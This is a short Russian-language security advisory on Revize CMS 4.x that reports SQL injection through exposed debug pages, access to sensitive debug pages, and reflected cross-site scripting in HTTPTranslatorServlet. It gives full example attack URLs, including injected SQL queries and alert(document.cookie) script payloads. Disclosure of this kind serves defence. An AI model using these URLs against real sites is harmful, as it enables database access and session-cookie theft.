Программа: Revize CMS 4.x
 
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "query" сценария "query_results.jsp". Удаленный пользователь может с
помощью специально сформированного URL выполнить произвольные SQL команды в базе
данных приложения.

Пример:

http://[Victim]/revize/debug/query_results.jsp? webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

2. Удаленный пользователь может получить доступ к потенциально важным данным на
системе.

Пример:

http://[Victim]/revize/debug/query_input.jsp? table=rSubjects&apptable&webspace=REVIZE

http://[Victim]/revize/debug/ http://[Victim]/revize/debug/apptables.html

http://[Victim]/revize/debug/main.html  

3. Межсайтовый скриптинг возможен из-за недостаточной обработки входных
данных в сервлете "HTTPTranslatorServlet". Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольный HTML код в
браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
& objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp
 

Оставить мнение